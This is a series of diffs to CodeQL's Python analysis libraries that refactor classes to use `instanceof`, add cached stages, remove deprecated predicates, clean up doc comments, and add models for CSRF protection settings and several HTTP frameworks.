Function getARequestHandler() { result = super.getARequestHandler() }
/**
* Gets a parameter that will receive parts of the url when handling incoming
* requests for this route, if any. These automatically become a `RemoteFlowSource`.
*/
Parameter getARoutedParameter() { result = range.getARoutedParameter() }
Parameter getARoutedParameter() { result = super.getARoutedParameter() }
/** Gets a string that identifies the framework used for this route setup. */
string getFramework() { result = range.getFramework() }
string getFramework() { result = super.getFramework() }
}
/** Provides a class for modeling new HTTP routing APIs. */
@@ -682,19 +781,15 @@ module HTTP {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `RequestHandler::Range` instead.
*/
class RequestHandler extends Function {
RequestHandler::Range range;
RequestHandler() { this = range }
class RequestHandler extends Function instanceof RequestHandler::Range {
/**
* Gets a parameter that could receive parts of the url when handling incoming
* requests, if any. These automatically become a `RemoteFlowSource`.
*/
Parameter getARoutedParameter() { result = range.getARoutedParameter() }
Parameter getARoutedParameter() { result = super.getARoutedParameter() }
/** Gets a string that identifies the framework used for this route setup. */
string getFramework() { result = range.getFramework() }
string getFramework() { result = super.getFramework() }
}
/** Provides a class for modeling new HTTP request handlers. */
@@ -750,16 +845,12 @@ module HTTP {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `HttpResponse::Range` instead.
*/
class HttpResponse extends DataFlow::Node {
HttpResponse::Range range;
HttpResponse() { this = range }
class HttpResponse extends DataFlow::Node instanceof HttpResponse::Range {
/** Gets the data-flow node that specifies the body of this HTTP response. */
DataFlow::Node getBody() { result = range.getBody() }
DataFlow::Node getBody() { result = super.getBody() }
/** Gets the mimetype of this HTTP response, if it can be statically determined. */
string getMimetype() { result = range.getMimetype() }
string getMimetype() { result = super.getMimetype() }
}
/** Provides a class for modeling new HTTP response APIs. */
@@ -805,13 +896,9 @@ module HTTP {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `HttpRedirectResponse::Range` instead.
*/
class HttpRedirectResponse extends HttpResponse {
override HttpRedirectResponse::Range range;
HttpRedirectResponse() { this = range }
class HttpRedirectResponse extends HttpResponse instanceof HttpRedirectResponse::Range {
/** Gets the data-flow node that specifies the location of this HTTP redirect response. */
DataFlow::Node getRedirectLocation() { result = range.getRedirectLocation() }
DataFlow::Node getRedirectLocation() { result = super.getRedirectLocation() }
}
/** Provides a class for modeling new HTTP redirect response APIs. */
@@ -837,25 +924,21 @@ module HTTP {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `HTTP::CookieWrite::Range` instead.
*/
class CookieWrite extends DataFlow::Node {
CookieWrite::Range range;
CookieWrite() { this = range }
class CookieWrite extends DataFlow::Node instanceof CookieWrite::Range {
/**
* Gets the argument, if any, specifying the raw cookie header.
*/
DataFlow::Node getHeaderArg() { result = range.getHeaderArg() }
DataFlow::Node getHeaderArg() { result = super.getHeaderArg() }
/**
* Gets the argument, if any, specifying the cookie name.
*/
DataFlow::Node getNameArg() { result = range.getNameArg() }
DataFlow::Node getNameArg() { result = super.getNameArg() }
/**
* Gets the argument, if any, specifying the cookie value.
*/
DataFlow::Node getValueArg() { result = range.getValueArg() }
DataFlow::Node getValueArg() { result = super.getValueArg() }
}
/** Provides a class for modeling new cookie writes on HTTP responses. */
@@ -886,6 +969,76 @@ module HTTP {
abstract DataFlow::Node getValueArg();
}
}
/**
* A data-flow node that enables or disables Cross-site request forgery protection
* in a global manner.
*
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `CsrfProtectionSetting::Range` instead.
*/
class CsrfProtectionSetting extends DataFlow::Node instanceof CsrfProtectionSetting::Range {
/**
* Gets the boolean value corresponding to if CSRF protection is enabled
* (`true`) or disabled (`false`) by this node.
*/
boolean getVerificationSetting() { result = super.getVerificationSetting() }
}
/** Provides a class for modeling new CSRF protection setting APIs. */
module CsrfProtectionSetting {
/**
* A data-flow node that enables or disables Cross-site request forgery protection
* in a global manner.
*
* Extend this class to model new APIs. If you want to refine existing API models,
* extend `CsrfProtectionSetting` instead.
*/
abstract class Range extends DataFlow::Node {
/**
* Gets the boolean value corresponding to if CSRF protection is enabled
* (`true`) or disabled (`false`) by this node.
*/
abstract boolean getVerificationSetting();
}
}
/**
* A data-flow node that enables or disables Cross-site request forgery protection
* for a specific part of an application.
*
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `CsrfLocalProtectionSetting::Range` instead.
*/
class CsrfLocalProtectionSetting extends DataFlow::Node instanceof CsrfLocalProtectionSetting::Range {
/**
* Gets a request handler whose CSRF protection is changed.
*/
Function getRequestHandler() { result = super.getRequestHandler() }
/** Holds if CSRF protection is enabled by this setting */
predicate csrfEnabled() { super.csrfEnabled() }
}
/** Provides a class for modeling new CSRF protection setting APIs. */
module CsrfLocalProtectionSetting {
/**
* A data-flow node that enables or disables Cross-site request forgery protection
* for a specific part of an application.
*
* Extend this class to model new APIs. If you want to refine existing API models,
* extend `CsrfLocalProtectionSetting` instead.
*/
abstract class Range extends DataFlow::Node {
/**
* Gets a request handler whose CSRF protection is changed.
*/
abstract Function getRequestHandler();
/** Holds if CSRF protection is enabled by this setting */
abstract predicate csrfEnabled();
}
}
}
/** Provides classes for modeling HTTP clients. */
@@ -972,27 +1125,23 @@ module Cryptography {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `KeyGeneration::Range` instead.
*/
class KeyGeneration extends DataFlow::Node {
KeyGeneration::Range range;
KeyGeneration() { this = range }
class KeyGeneration extends DataFlow::Node instanceof KeyGeneration::Range {
/** Gets the name of the cryptographic algorithm (for example `"RSA"` or `"AES"`). */
string getName() { result = range.getName() }
string getName() { result = super.getName() }
/** Gets the argument that specifies the size of the key in bits, if available. */
DataFlow::Node getKeySizeArg() { result = range.getKeySizeArg() }
DataFlow::Node getKeySizeArg() { result = super.getKeySizeArg() }
/**
* Gets the size of the key generated (in bits), as well as the `origin` that
* explains how we obtained this specific key size.
*/
int getKeySizeWithOrigin(DataFlow::Node origin) {
result = range.getKeySizeWithOrigin(origin)
result = super.getKeySizeWithOrigin(origin)
}
/** Gets the minimum key size (in bits) for this algorithm to be considered secure. */
int minimumSecureKeySize() { result = range.minimumSecureKeySize() }
int minimumSecureKeySize() { result = super.minimumSecureKeySize() }
}
/** Provides classes for modeling new key-pair generation APIs. */
@@ -1071,16 +1220,12 @@ module Cryptography {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `CryptographicOperation::Range` instead.
*/
class CryptographicOperation extends DataFlow::Node {
CryptographicOperation::Range range;
CryptographicOperation() { this = range }
class CryptographicOperation extends DataFlow::Node instanceof CryptographicOperation::Range {
/** Gets the algorithm used, if it matches a known `CryptographicAlgorithm`. */
CryptographicAlgorithm getAlgorithm() { result = range.getAlgorithm() }
CryptographicAlgorithm getAlgorithm() { result = super.getAlgorithm() }
/** Gets an input the algorithm is used on, for example the plain text input to be encrypted. */
DataFlow::Node getAnInput() { result = range.getAnInput() }
DataFlow::Node getAnInput() { result = super.getAnInput() }
}
/** Provides classes for modeling new applications of a cryptographic algorithms. */

View File

@@ -1,6 +1,7 @@
import python
private import semmle.python.pointsto.PointsTo
private import semmle.python.objects.ObjectInternal
private import semmle.python.internal.CachedStages
/** An expression */
class Expr extends Expr_, AstNode {
@@ -8,7 +9,11 @@ class Expr extends Expr_, AstNode {
override Scope getScope() { py_scopes(this, result) }
/** Gets a textual representation of this element. */
override string toString() { result = "Expression" }
cached
override string toString() {
Stages::AST::ref() and
result = "Expression"
}
/** Gets the module in which this expression occurs */
Module getEnclosingModule() { result = this.getScope().getEnclosingModule() }
@@ -30,9 +35,6 @@ class Expr extends Expr_, AstNode {
/** Whether this expression is a constant */
predicate isConstant() { not this.isVariable() }
/** Use isParenthesized instead. */
deprecated override predicate isParenthesised() { this.isParenthesized() }
/** Whether the parenthesized property of this expression is true. */
predicate isParenthesized() { Expr_.super.isParenthesised() }
@@ -49,9 +51,6 @@ class Expr extends Expr_, AstNode {
/** Gets an immediate (non-nested) sub-expression of this expression */
Expr getASubExpression() { none() }
/** Use StrConst.getText() instead */
deprecated string strValue() { none() }
override AstNode getAChildNode() { result = this.getASubExpression() }
/**
@@ -190,7 +189,16 @@ class Call extends Call_ {
*/
Keyword getKeyword(int index) {
result = this.getNamedArg(index) and
not exists(DictUnpacking d, int lower | d = this.getNamedArg(lower) and lower < index)
(
not exists(this.getMinimumUnpackingIndex())
or
index <= this.getMinimumUnpackingIndex()
)
}
/** Gets the minimum index (if any) at which a dictionary unpacking (`**foo`) occurs in this call. */
private int getMinimumUnpackingIndex() {
result = min(int i | this.getNamedArg(i) instanceof DictUnpacking)
}
/**
@@ -315,7 +323,7 @@ class Ellipsis extends Ellipsis_ {
}
/**
* Immutable literal expressions (except tuples).
* An immutable literal expression (except tuples).
* Consists of string (both unicode and byte) literals and numeric literals.
*/
abstract class ImmutableLiteral extends Expr {
@@ -446,6 +454,8 @@ class Unicode extends StrConst {
}
/**
* Gets the quoted representation fo this string.
*
* The extractor puts quotes into the name of each string (to prevent "0" clashing with 0).
* The following predicate help us match up a string/byte literals in the source
* which the equivalent object.
@@ -620,8 +630,6 @@ class StrConst extends Str_, ImmutableLiteral {
)
}
deprecated override string strValue() { result = this.getS() }
override Expr getASubExpression() { none() }
override AstNode getAChildNode() { result = this.getAnImplicitlyConcatenatedPart() }
@@ -685,7 +693,7 @@ class False extends BooleanLiteral {
override boolean booleanValue() { result = false }
}
/** `None` */
/** The `None` constant. */
class None extends NameConstant {
/* syntax: None */
None() { name_consts(this, "None") }
@@ -728,20 +736,20 @@ class Guard extends Guard_ {
/** A context in which an expression used */
class ExprContext extends ExprContext_ { }
/** Load context, the context of var in len(var) */
/** The load context, the context of var in len(var) */
class Load extends Load_ { }
/** Store context, the context of var in var = 0 */
/** The store context, the context of var in var = 0 */
class Store extends Store_ { }
/** Delete context, the context of var in del var */
/** The delete context, the context of var in del var */
class Del extends Del_ { }
/** This is an artifact of the Python grammar which includes an AugLoad context, even though it is never used. */
library class AugLoad extends AugLoad_ { }
/** The context of an augmented load. This is an artifact of the Python grammar which includes an AugLoad context, even though it is never used. */
class AugLoad extends AugLoad_ { }
/** Augmented store context, the context of var in var += 1 */
/** The augmented store context, the context of var in var += 1 */
class AugStore extends AugStore_ { }
/** Parameter context, the context of var in def f(var): pass */
/** The parameter context, the context of var in def f(var): pass */
class Param extends Param_ { }

View File

@@ -2,12 +2,6 @@ import python
/** A file */
class File extends Container, @file {
/** DEPRECATED: Use `getAbsolutePath` instead. */
deprecated override string getName() { result = this.getAbsolutePath() }
/** DEPRECATED: Use `getAbsolutePath` instead. */
deprecated string getFullName() { result = this.getAbsolutePath() }
/**
* Holds if this element is at the specified location.
* The location spans column `startcolumn` of line `startline` to
@@ -115,9 +109,6 @@ private predicate occupied_line(File f, int n) {
/** A folder (directory) */
class Folder extends Container, @folder {
/** DEPRECATED: Use `getAbsolutePath` instead. */
deprecated override string getName() { result = this.getAbsolutePath() }
/**
* Holds if this element is at the specified location.
* The location spans column `startcolumn` of line `startline` to
@@ -156,9 +147,6 @@ class Folder extends Container, @folder {
abstract class Container extends @container {
Container getParent() { containerparent(result, this) }
/** Gets a child of this container */
deprecated Container getChild() { containerparent(this, result) }
/**
* Gets a textual representation of the path of this container.
*
@@ -166,8 +154,11 @@ abstract class Container extends @container {
*/
string toString() { result = this.getAbsolutePath() }
/** Gets the name of this container */
abstract string getName();
/**
* Gets the name of this container.
* DEPRECATED: Use `getAbsolutePath` instead.
*/
deprecated string getName() { result = this.getAbsolutePath() }
/**
* Gets the relative path of this file or folder from the root folder of the
@@ -339,7 +330,7 @@ abstract class Container extends @container {
* paths. The list of paths is composed of the paths passed to the extractor and
* `sys.path`.
*/
predicate isImportRoot(int n) { this.getName() = import_path_element(n) }
predicate isImportRoot(int n) { this.getAbsolutePath() = import_path_element(n) }
/** Holds if this folder is the root folder for the standard library. */
predicate isStdLibRoot(int major, int minor) {

View File

@@ -1,5 +1,6 @@
import python
private import semmle.python.pointsto.PointsTo
private import semmle.python.internal.CachedStages
/*
* Note about matching parent and child nodes and CFG splitting:
@@ -82,30 +83,12 @@ class ControlFlowNode extends @py_flow_node {
toAst(this) instanceof NameConstant
}
/** Use NameNode.isLoad() instead */
deprecated predicate isUse() { toAst(this) instanceof Name and this.isLoad() }
/** Use NameNode.isStore() */
deprecated predicate isDefinition() { toAst(this) instanceof Name and this.isStore() }
/** Whether this flow node corresponds to an attribute expression */
predicate isAttribute() { toAst(this) instanceof Attribute }
/** Use AttrNode.isLoad() instead */
deprecated predicate isAttributeLoad() { toAst(this) instanceof Attribute and this.isLoad() }
/** Use AttrNode.isStore() instead */
deprecated predicate isAttributeStore() { toAst(this) instanceof Attribute and this.isStore() }
/** Whether this flow node corresponds to an subscript expression */
predicate isSubscript() { toAst(this) instanceof Subscript }
/** Use SubscriptNode.isLoad() instead */
deprecated predicate isSubscriptLoad() { toAst(this) instanceof Subscript and this.isLoad() }
/** Use SubscriptNode.isStore() instead */
deprecated predicate isSubscriptStore() { toAst(this) instanceof Subscript and this.isStore() }
/** Whether this flow node corresponds to an import member */
predicate isImportMember() { toAst(this) instanceof ImportMember }
@@ -140,7 +123,9 @@ class ControlFlowNode extends @py_flow_node {
AstNode getNode() { py_flow_bb_node(this, result, _, _) }
/** Gets a textual representation of this element. */
cached
string toString() {
Stages::DataFlow::ref() and
exists(Scope s | s.getEntryNode() = this | result = "Entry node for " + s.toString())
or
exists(Scope s | s.getANormalExit() = this | result = "Exit node for " + s.toString())
@@ -155,7 +140,7 @@ class ControlFlowNode extends @py_flow_node {
/** Whether this flow node is the first in its scope */
predicate isEntryNode() { py_scope_flow(this, _, -1) }
/** The value that this ControlFlowNode points-to. */
/** Gets the value that this ControlFlowNode points-to. */
predicate pointsTo(Value value) { this.pointsTo(_, value, _) }
/** Gets the value that this ControlFlowNode points-to. */
@@ -164,10 +149,10 @@ class ControlFlowNode extends @py_flow_node {
/** Gets a value that this ControlFlowNode may points-to. */
Value inferredValue() { this.pointsTo(_, result, _) }
/** The value and origin that this ControlFlowNode points-to. */
/** Gets the value and origin that this ControlFlowNode points-to. */
predicate pointsTo(Value value, ControlFlowNode origin) { this.pointsTo(_, value, origin) }
/** The value and origin that this ControlFlowNode points-to, given the context. */
/** Gets the value and origin that this ControlFlowNode points-to, given the context. */
predicate pointsTo(Context context, Value value, ControlFlowNode origin) {
PointsTo::pointsTo(this, context, value, origin)
}
@@ -209,7 +194,9 @@ class ControlFlowNode extends @py_flow_node {
BasicBlock getBasicBlock() { result.contains(this) }
/** Gets the scope containing this flow node */
cached
Scope getScope() {
Stages::AST::ref() and
if this.getNode() instanceof Scope
then
/* Entry or exit node */
@@ -317,7 +304,7 @@ class ControlFlowNode extends @py_flow_node {
exists(BasicBlock b, int i, int j | this = b.getNode(i) and other = b.getNode(j) and i < j)
}
/* Holds if this CFG node is a branch */
/** Holds if this CFG node is a branch */
predicate isBranch() { py_true_successors(this, _) or py_false_successors(this, _) }
ControlFlowNode getAChild() { result = this.getExprChild(this.getBasicBlock()) }
@@ -376,7 +363,7 @@ class CallNode extends ControlFlowNode {
)
}
/** Gets the flow node corresponding to the nth argument of the call corresponding to this flow node */
/** Gets the flow node corresponding to the n'th positional argument of the call corresponding to this flow node */
ControlFlowNode getArg(int n) {
exists(Call c |
this.getNode() = c and
@@ -439,12 +426,6 @@ class AttrNode extends ControlFlowNode {
)
}
/** Use getObject() instead */
deprecated ControlFlowNode getValue() { result = this.getObject() }
/** Use getObject(name) instead */
deprecated ControlFlowNode getValue(string name) { result = this.getObject(name) }
/**
* Gets the flow node corresponding to the object of the attribute expression corresponding to this flow node,
* with the matching name
@@ -507,18 +488,6 @@ class ImportStarNode extends ControlFlowNode {
class SubscriptNode extends ControlFlowNode {
SubscriptNode() { toAst(this) instanceof Subscript }
/**
* DEPRECATED: Use `getObject()` instead.
* This will be formally deprecated before the end 2018 and removed in 2019.
*/
deprecated ControlFlowNode getValue() {
exists(Subscript s |
this.getNode() = s and
s.getObject() = result.getNode() and
result.getBasicBlock().dominates(this.getBasicBlock())
)
}
/** flow node corresponding to the value of the sequence in a subscript operation */
ControlFlowNode getObject() {
exists(Subscript s |
@@ -650,7 +619,9 @@ class UnaryExprNode extends ControlFlowNode {
* and nodes implicitly assigned in class and function definitions and imports.
*/
class DefinitionNode extends ControlFlowNode {
cached
DefinitionNode() {
Stages::AST::ref() and
exists(Assign a | a.getATarget().getAFlowNode() = this)
or
exists(AnnAssign a | a.getTarget().getAFlowNode() = this and exists(a.getValue()))
@@ -709,6 +680,7 @@ abstract class SequenceNode extends ControlFlowNode {
ControlFlowNode getAnElement() { result = this.getElement(_) }
/** Gets the control flow node for the nth element of this sequence */
cached
abstract ControlFlowNode getElement(int n);
}
@@ -717,6 +689,7 @@ class TupleNode extends SequenceNode {
TupleNode() { toAst(this) instanceof Tuple }
override ControlFlowNode getElement(int n) {
Stages::AST::ref() and
exists(Tuple t | this.getNode() = t and result.getNode() = t.getElt(n)) and
(
result.getBasicBlock().dominates(this.getBasicBlock())
@@ -950,10 +923,6 @@ class NameNode extends ControlFlowNode {
/** A control flow node corresponding to a named constant, one of `None`, `True` or `False`. */
class NameConstantNode extends NameNode {
NameConstantNode() { exists(NameConstant n | py_flow_bb_node(this, n, _, _)) }
deprecated override predicate defines(Variable v) { none() }
deprecated override predicate deletes(Variable v) { none() }
/*
* We ought to override uses as well, but that has
* a serious performance impact.
@@ -1009,12 +978,6 @@ private module Scopes {
scope = n.getEnclosingModule()
}
private predicate maybe_defined(SsaVariable var) {
exists(var.getDefinition()) and not py_ssa_phi(var, _) and not var.getDefinition().isDelete()
or
exists(SsaVariable input | input = var.getAPhiInput() | maybe_defined(input))
}
private predicate maybe_undefined(SsaVariable var) {
not exists(var.getDefinition()) and not py_ssa_phi(var, _)
or
@@ -1044,11 +1007,13 @@ class BasicBlock extends @py_flow_node {
string toString() { result = "BasicBlock" }
/** Whether this basic block strictly dominates the other */
pragma[nomagic]
predicate strictlyDominates(BasicBlock other) { other.getImmediateDominator+() = this }
cached
predicate strictlyDominates(BasicBlock other) {
Stages::AST::ref() and
other.getImmediateDominator+() = this
}
/** Whether this basic block dominates the other */
pragma[nomagic]
predicate dominates(BasicBlock other) {
this = other
or
@@ -1057,6 +1022,7 @@ class BasicBlock extends @py_flow_node {
cached
BasicBlock getImmediateDominator() {
Stages::AST::ref() and
this.firstNode().getImmediateDominator().getBasicBlock() = result
}
@@ -1094,7 +1060,11 @@ class BasicBlock extends @py_flow_node {
}
/** Gets a successor to this basic block */
BasicBlock getASuccessor() { result = this.getLastNode().getASuccessor().getBasicBlock() }
cached
BasicBlock getASuccessor() {
Stages::AST::ref() and
result = this.getLastNode().getASuccessor().getBasicBlock()
}
/** Gets a predecessor to this basic block */
BasicBlock getAPredecessor() { result.getASuccessor() = this }
@@ -1164,7 +1134,11 @@ class BasicBlock extends @py_flow_node {
}
/** Holds if this basic block strictly reaches the other. Is the start of other reachable from the end of this. */
predicate strictlyReaches(BasicBlock other) { this.getASuccessor+() = other }
cached
predicate strictlyReaches(BasicBlock other) {
Stages::AST::ref() and
this.getASuccessor+() = other
}
/** Holds if this basic block reaches the other. Is the start of other reachable from the end of this. */
predicate reaches(BasicBlock other) { this = other or this.strictlyReaches(other) }

View File

@@ -19,17 +19,22 @@ private import semmle.python.frameworks.FastApi
private import semmle.python.frameworks.Flask
private import semmle.python.frameworks.FlaskAdmin
private import semmle.python.frameworks.FlaskSqlAlchemy
private import semmle.python.frameworks.Httpx
private import semmle.python.frameworks.Idna
private import semmle.python.frameworks.Invoke
private import semmle.python.frameworks.Jmespath
private import semmle.python.frameworks.Ldap
private import semmle.python.frameworks.Ldap3
private import semmle.python.frameworks.Libtaxii
private import semmle.python.frameworks.Libxml2
private import semmle.python.frameworks.Lxml
private import semmle.python.frameworks.MarkupSafe
private import semmle.python.frameworks.Multidict
private import semmle.python.frameworks.Mysql
private import semmle.python.frameworks.MySQLdb
private import semmle.python.frameworks.Peewee
private import semmle.python.frameworks.Psycopg2
private import semmle.python.frameworks.Pycurl
private import semmle.python.frameworks.Pydantic
private import semmle.python.frameworks.PyMySQL
private import semmle.python.frameworks.Requests
@@ -44,5 +49,7 @@ private import semmle.python.frameworks.Toml
private import semmle.python.frameworks.Tornado
private import semmle.python.frameworks.Twisted
private import semmle.python.frameworks.Ujson
private import semmle.python.frameworks.Urllib3
private import semmle.python.frameworks.Yaml
private import semmle.python.frameworks.Yarl
private import semmle.python.frameworks.Xmltodict

View File

@@ -5,11 +5,11 @@ import python
* It is the syntactic entity that is compiled to a code object.
*/
class Function extends Function_, Scope, AstNode {
/** The expression defining this function */
/** Gets the expression defining this function */
CallableExpr getDefinition() { result = this.getParent() }
/**
* The scope in which this function occurs, will be a class for a method,
* Gets the scope in which this function occurs. This will be a class for a method,
* another function for nested functions, generator expressions or comprehensions,
* or a module for a plain function.
*/
@@ -167,24 +167,24 @@ class Function extends Function_, Scope, AstNode {
/** A def statement. Note that FunctionDef extends Assign as a function definition binds the newly created function */
class FunctionDef extends Assign {
FunctionExpr f;
/* syntax: def name(...): ... */
FunctionDef() {
/* This is an artificial assignment the rhs of which is a (possibly decorated) FunctionExpr */
exists(FunctionExpr f | this.getValue() = f or this.getValue() = f.getADecoratorCall())
this.getValue() = f or this.getValue() = f.getADecoratorCall()
}
override string toString() { result = "FunctionDef" }
/** Gets the function for this statement */
Function getDefinedFunction() {
exists(FunctionExpr func | this.containsInScope(func) and result = func.getInnerScope())
}
Function getDefinedFunction() { result = f.getInnerScope() }
override Stmt getLastStatement() { result = this.getDefinedFunction().getLastStatement() }
}
/** A function that uses 'fast' locals, stored in the frame not in a dictionary. */
class FastLocalsFunction extends Function {
/** A function that uses 'fast' locals, stored in the frame not in a dictionary. */
FastLocalsFunction() {
not exists(ImportStar i | i.getScope() = this) and
not exists(Exec e | e.getScope() = this)

View File

@@ -1,5 +1,6 @@
import python
private import semmle.python.types.Builtins
private import semmle.python.internal.CachedStages
/**
* An alias in an import statement, the `mod as name` part of `import mod as name`. May be artificial;
@@ -35,6 +36,8 @@ class ImportExpr extends ImportExpr_ {
}
/**
* Gets the level of this import.
*
* The language specifies level as -1 if relative imports are to be tried first, 0 for absolute imports,
* and level > 0 for explicit relative imports.
*/
@@ -165,13 +168,6 @@ class Import extends Import_ {
result = this.getAName().getValue().(ImportMember).getModule()
}
/**
* Use getAnImportedModuleName(),
* possibly combined with ModuleObject.importedAs()
* Gets a module imported by this import statement
*/
deprecated Module getAModule() { result.getName() = this.getAnImportedModuleName() }
/** Whether this a `from ... import ...` statement */
predicate isFromImport() { this.getAName().getValue() instanceof ImportMember }
@@ -188,7 +184,7 @@ class Import extends Import_ {
* For example, for the import statement `import bar` which
* is a relative import in package "foo", this would return
* "foo.bar".
* The import statment `from foo import bar` would return
* The import statement `from foo import bar` would return
* `foo` and `foo.bar`
*/
string getAnImportedModuleName() {
@@ -208,7 +204,9 @@ class Import extends Import_ {
/** An import * statement */
class ImportStar extends ImportStar_ {
/* syntax: from modname import * */
cached
ImportExpr getModuleExpr() {
Stages::AST::ref() and
result = this.getModule()
or
result = this.getModule().(ImportMember).getModule()
@@ -216,13 +214,6 @@ class ImportStar extends ImportStar_ {
override string toString() { result = "from " + this.getModuleExpr().getName() + " import *" }
/**
* Use getAnImportedModuleName(),
* possibly combined with ModuleObject.importedAs()
* Gets the module imported by this import * statement
*/
deprecated Module getTheModule() { result.getName() = this.getImportedModuleName() }
override Expr getASubExpression() { result = this.getModule() }
override Stmt getASubStatement() { none() }

View File

@@ -18,7 +18,7 @@ class FunctionMetrics extends Function {
int getNumberOfLinesOfDocStrings() { py_docstringlines(this, result) }
/**
* Cyclomatic complexity:
* Gets the cyclomatic complexity of the function:
* The number of linearly independent paths through the source code.
* Computed as E - N + 2P,
* where
@@ -27,9 +27,9 @@ class FunctionMetrics extends Function {
* P = the number of connected components, which for a single function is 1.
*/
int getCyclomaticComplexity() {
exists(int E, int N |
N = count(BasicBlock b | b = this.getABasicBlock() and b.likelyReachable()) and
E =
exists(int e, int n |
n = count(BasicBlock b | b = this.getABasicBlock() and b.likelyReachable()) and
e =
count(BasicBlock b1, BasicBlock b2 |
b1 = this.getABasicBlock() and
b1.likelyReachable() and
@@ -39,7 +39,7 @@ class FunctionMetrics extends Function {
not b1.unlikelySuccessor(b2)
)
|
result = E - N + 2
result = e - n + 2
)
}
@@ -130,13 +130,13 @@ class ClassMetrics extends Class {
}
/**
* The afferent coupling of a class is the number of classes that
* Gets the afferent coupling of a class -- the number of classes that
* directly depend on it.
*/
int getAfferentCoupling() { result = count(ClassMetrics t | t.dependsOn(this)) }
/**
* The efferent coupling of a class is the number of classes that
* Gets the efferent coupling of a class -- the number of classes that
* it directly depends on.
*/
int getEfferentCoupling() { result = count(ClassMetrics t | this.dependsOn(t)) }
@@ -273,13 +273,13 @@ class ModuleMetrics extends Module {
int getNumberOfLinesOfDocStrings() { py_docstringlines(this, result) }
/**
* The afferent coupling of a class is the number of classes that
* Gets the afferent coupling of a class -- the number of classes that
* directly depend on it.
*/
int getAfferentCoupling() { result = count(ModuleMetrics t | t.dependsOn(this)) }
/**
* The efferent coupling of a class is the number of classes that
* Gets the efferent coupling of a class -- the number of classes that
* it directly depends on.
*/
int getEfferentCoupling() { result = count(ModuleMetrics t | this.dependsOn(t)) }

View File

@@ -1,6 +1,6 @@
import python
private import semmle.python.objects.ObjectAPI
private import semmle.python.objects.Modules
private import semmle.python.internal.CachedStages
/**
* A module. This is the top level element in an AST, corresponding to a source file.
@@ -22,12 +22,13 @@ class Module extends Module_, Scope, AstNode {
}
/**
* Gets the enclosing scope of this module (always none).
*
* This method will be deprecated in the next release. Please use `getEnclosingScope()` instead.
* The enclosing scope of this module (always none)
*/
override Scope getScope() { none() }
/** The enclosing scope of this module (always none) */
/** Gets the enclosing scope of this module (always none) */
override Scope getEnclosingScope() { none() }
/** Gets the statements forming the body of this module */
@@ -98,12 +99,6 @@ class Module extends Module_, Scope, AstNode {
/** Gets the metrics for this module */
ModuleMetrics getMetrics() { result = this }
/**
* Use ModuleObject.getAnImportedModule() instead.
* Gets a module imported by this module
*/
deprecated Module getAnImportedModule() { result.getName() = this.getAnImportedModuleName() }
string getAnImportedModuleName() {
exists(Import i | i.getEnclosingModule() = this | result = i.getAnImportedModuleName())
or
@@ -196,7 +191,7 @@ private predicate isPotentialSourcePackage(Folder f) {
private predicate isPotentialPackage(Folder f) {
exists(f.getFile("__init__.py"))
or
py_flags_versioned("options.respect_init", "False", _) and major_version() = 2
py_flags_versioned("options.respect_init", "False", _) and major_version() = 2 and exists(f)
}
private string moduleNameFromBase(Container file) {
@@ -226,7 +221,9 @@ private predicate transitively_imported_from_entry_point(File file) {
)
}
cached
string moduleNameFromFile(Container file) {
Stages::AST::ref() and
exists(string basename |
basename = moduleNameFromBase(file) and
legalShortName(basename)

View File

@@ -1,6 +1,6 @@
import python
/** Base class for operators */
/** The base class for operators */
class Operator extends Operator_ {
/** Gets the name of the special method used to implement this operator */
string getSpecialMethodName() { none() }
@@ -131,7 +131,7 @@ class Compare extends Compare_ {
}
}
/** List of comparison operators in a comparison */
/** A list of comparison operators in a comparison */
class CmpopList extends CmpopList_ { }
/** A comparison operator */

View File

@@ -10,6 +10,7 @@ class Pattern extends Pattern_, AstNode {
override Scope getScope() { result = this.getCase().getScope() }
/** Gets the case statement containing this pattern */
pragma[nomagic]
Case getCase() { result.contains(this) }
override string toString() { result = "Pattern" }

View File

@@ -39,7 +39,12 @@ newtype TRegExpParent =
/** A special character */
TRegExpSpecialChar(Regex re, int start, int end) { re.specialCharacter(start, end, _) } or
/** A normal character */
TRegExpNormalChar(Regex re, int start, int end) { re.normalCharacter(start, end) } or
TRegExpNormalChar(Regex re, int start, int end) {
re.normalCharacterSequence(start, end)
or
re.escapedCharacter(start, end) and
not re.specialCharacter(start, end, _)
} or
/** A back reference */
TRegExpBackRef(Regex re, int start, int end) { re.backreference(start, end) }
@@ -440,6 +445,8 @@ class RegExpAlt extends RegExpTerm, TRegExpAlt {
override string getPrimaryQLClass() { result = "RegExpAlt" }
}
class RegExpCharEscape = RegExpEscape;
/**
* An escaped regular expression term, that is, a regular expression
* term starting with a backslash, which is not a backreference.
@@ -545,7 +552,7 @@ class RegExpWordBoundary extends RegExpSpecialChar {
/**
* A character class escape in a regular expression.
* That is, an escaped charachter that denotes multiple characters.
* That is, an escaped character that denotes multiple characters.
*
* Examples:
*
@@ -746,6 +753,9 @@ class RegExpGroup extends RegExpTerm, TRegExpGroup {
*/
int getNumber() { result = re.getGroupNumber(start, end) }
/** Holds if this is a capture group. */
predicate isCapture() { exists(this.getNumber()) }
/** Holds if this is a named capture group. */
predicate isNamed() { exists(this.getName()) }

View File

@@ -9,11 +9,12 @@ class Scope extends Scope_ {
Module getEnclosingModule() { result = this.getEnclosingScope().getEnclosingModule() }
/**
* Gets the scope enclosing this scope (modules have no enclosing scope).
*
* This method will be deprecated in the next release. Please use `getEnclosingScope()` instead.
* The reason for this is to avoid confusion around use of `x.getScope+()` where `x` might be an
* `AstNode` or a `Variable`. Forcing the users to write `x.getScope().getEnclosingScope*()` ensures that
* the apparent semantics and the actual semantics coincide.
* [ Gets the scope enclosing this scope (modules have no enclosing scope) ]
*/
Scope getScope() { none() }

View File

@@ -31,7 +31,7 @@ private predicate self_attribute(Attribute attr, Class cls) {
)
}
/** Helper class for UndefinedClassAttribute.ql &amp; MaybeUndefinedClassAttribute.ql */
/** A helper class for UndefinedClassAttribute.ql &amp; MaybeUndefinedClassAttribute.ql */
class SelfAttributeRead extends SelfAttribute {
SelfAttributeRead() {
this.getCtx() instanceof Load and

View File

@@ -8,7 +8,7 @@
* Extend `SpecialMethod::Potential` to capture more cases.
*/
import python
private import python
/** A control flow node which might correspond to a special method call. */
